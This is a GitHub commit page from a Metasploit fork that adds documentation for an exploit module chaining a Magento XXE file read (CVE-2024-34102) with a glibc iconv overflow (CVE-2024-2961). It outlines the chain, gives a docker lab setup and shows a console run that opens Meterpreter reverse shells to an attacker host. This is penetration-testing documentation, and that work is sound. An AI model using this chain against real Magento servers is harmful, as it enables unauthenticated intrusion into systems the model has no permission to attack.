forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Magento XXE to GLIBC buffer overflow
- Loading branch information
1 parent
76d55c9
commit 9536eaa
Showing
3 changed files
with
784 additions
and
0 deletions.
There are no files selected for viewing
154 changes: 154 additions & 0 deletions
154
documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,154 @@ | ||
## Vulnerable Application | ||
This combination of an Arbitrary File Read (CVE-2024-34102) and a Buffer Overflow in glibc (CVE-2024-2961) | ||
allows for unauthenticated Remote Code Execution on the following versions of Magento and Adobe Commerce and | ||
earlier if the PHP and glibc versions are also vulnerable: | ||
- 2.4.7 and earlier | ||
- 2.4.6-p5 and earlier | ||
- 2.4.5-p7 and earlier | ||
- 2.4.4-p8 and earlier | ||
|
||
Vulenerable PHP versions: | ||
- From PHP 7.0.0 (2015) to 8.3.7 (2024) | ||
|
||
Vulnerable iconv() function in the GNU C Library: | ||
- 2.39 and earlier | ||
|
||
The exploit chain is quite interesting and for more detailed information I suggest reading the links in the | ||
references. I'll give a very brief over view. CVE-2024-34102 is and XML External Entity vulnerability which | ||
leverages PHP filters to read arbitrary files off the target system. The exploit chain uses this to read | ||
/proc/self/maps off the system which provides the address of PHP's heap and the filename of the libc. Then | ||
using the file read again the libc binary is downloaded and the exploit extracts the address and offset of the | ||
following functions which are used to write the payload: libc_malloc, libc_system and libc_realloc. | ||
|
||
With this information and expert knowledge of PHP, it's: chunks, free lists, buckets, bucket brigades and how | ||
all such things are are stored in memory and affected by PHP filters, CVE-2024-2961 can then be exploited. A | ||
long chain of PHP filters is constructed and sent in the same way the XXE is exploited which allows for; a | ||
payload to be written to memory and for the buffer overflow to be exploited in order to redirect execution to | ||
obtain RCE. | ||
|
||
### Setup | ||
|
||
The following docker-compose file can be used to test this module. There are a few things that need to be noted: | ||
1. cURL is not installed by default in the target container, in order for a fetch payload to be successful run the | ||
following once the container has been started: | ||
``` | ||
docker exec -it magento_magento_1 bash | ||
root@13c538f53068:/# apt update; apt install curl -y | ||
``` | ||
2. The docker-compose file sets magento server's name to `localhost` and in order to exploit the container `rhost` must | ||
be set to `localhost` (setting `rhost` to `127.0.0.1` or your local IP address will not work for this docker-compose file) | ||
and so given this configuration `msfconsole` must be running on the same host as the container. | ||
3. The network settings on my macbook didn't allow me to exploit this locally so I was running the containers and | ||
`msfconsole` from an Ubuntu 22.04 VM. | ||
|
||
``` | ||
services: | ||
mariadb: | ||
image: docker.io/bitnami/mariadb:10.6 | ||
environment: | ||
# ALLOW_EMPTY_PASSWORD is recommended only for development. | ||
- ALLOW_EMPTY_PASSWORD=yes | ||
- MARIADB_USER=bn_magento | ||
- MARIADB_DATABASE=bitnami_magento | ||
volumes: | ||
- 'old_mariadb_data:/bitnami/mariadb' | ||
magento: | ||
image: docker.io/bitnami/magento:2.4.7-debian-12-r0 | ||
ports: | ||
- '80:8080' | ||
- '443:8443' | ||
environment: | ||
- MAGENTO_HOST=localhost | ||
- MAGENTO_DATABASE_HOST=mariadb | ||
- MAGENTO_DATABASE_PORT_NUMBER=3306 | ||
- MAGENTO_DATABASE_USER=bn_magento | ||
- MAGENTO_DATABASE_NAME=bitnami_magento | ||
- ELASTICSEARCH_HOST=elasticsearch | ||
- ELASTICSEARCH_PORT_NUMBER=9200 | ||
# ALLOW_EMPTY_PASSWORD is recommended only for development. | ||
- ALLOW_EMPTY_PASSWORD=yes | ||
volumes: | ||
- 'old_magento_data:/bitnami/magento' | ||
depends_on: | ||
- mariadb | ||
- elasticsearch | ||
elasticsearch: | ||
image: docker.io/bitnami/elasticsearch:7 | ||
volumes: | ||
- 'old_elasticsearch_data:/bitnami/elasticsearch/data' | ||
volumes: | ||
old_mariadb_data: | ||
driver: local | ||
old_magento_data: | ||
driver: local | ||
old_elasticsearch_data: | ||
driver: local | ||
``` | ||
|
||
## Verification Steps | ||
|
||
1. Start msfconsole | ||
1. Do: `use ` | ||
1. Set the `RHOST`, `SRVHOST` and `LHOST` options | ||
1. Run the module | ||
1. Receive 3 Meterpreter sessions as the `daemon` user. | ||
|
||
## Scenarios | ||
### | ||
``` | ||
msf6 > use magento_xxe_to_glibc_buf_overflow | ||
Matching Modules | ||
================ | ||
# Name Disclosure Date Rank Check Description | ||
- ---- --------------- ---- ----- ----------- | ||
0 exploit/linux/http/magento_xxe_to_glibc_buf_overflow 1970-01-01 excellent No CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961) | ||
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/magento_xxe_to_glibc_buf_overflow | ||
[*] Using exploit/linux/http/magento_xxe_to_glibc_buf_overflow | ||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set srvhost 172.16.199.130 | ||
srvhost => 172.16.199.130 | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set fetch_srvhost 172.16.199.130 | ||
fetch_srvhost => 172.16.199.130 | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set rhost localhost | ||
rhost => localhost | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > run | ||
[*] Exploit running as background job 6. | ||
[*] Started reverse TCP handler on 172.16.199.130:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Using URL: http://172.16.199.130:8080/ | ||
[*] Server started | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > | ||
[+] Exploit precondition 1/3 met: Detected Magento Community edition version 2.4 which is vulnerable. | ||
[+] Exploit precondition 2/3 met: PHP appears to be exploitable. | ||
[+] Exploit precondition 3/3 met: glibc is version: 2.36 | ||
[+] The target appears to be vulnerable. | ||
[*] Attempting to parse libc to extract necessary symbols and addresses | ||
[*] Attempting to build an exploit PHP filter path with the information extracted from libc and /proc/self/maps | ||
[*] Sending payload... | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Sending stage (3045380 bytes) to 172.25.0.4 | ||
[*] Meterpreter session 4 opened (172.16.199.130:4444 -> 172.25.0.4:41354) at 2024-10-09 11:26:31 -0700 | ||
[*] Meterpreter session 5 opened (172.16.199.130:4444 -> 172.25.0.4:41366) at 2024-10-09 11:26:31 -0700 | ||
[*] Meterpreter session 6 opened (172.16.199.130:4444 -> 172.25.0.4:41370) at 2024-10-09 11:26:31 -0700 | ||
[*] Server stopped. | ||
msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > sessions -i -1 | ||
[*] Starting interaction with 6... | ||
meterpreter > getuid | ||
Server username: daemon | ||
meterpreter > sysinfo | ||
Computer : 172.25.0.4 | ||
OS : Debian 12.5 (Linux 6.8.0-45-generic) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.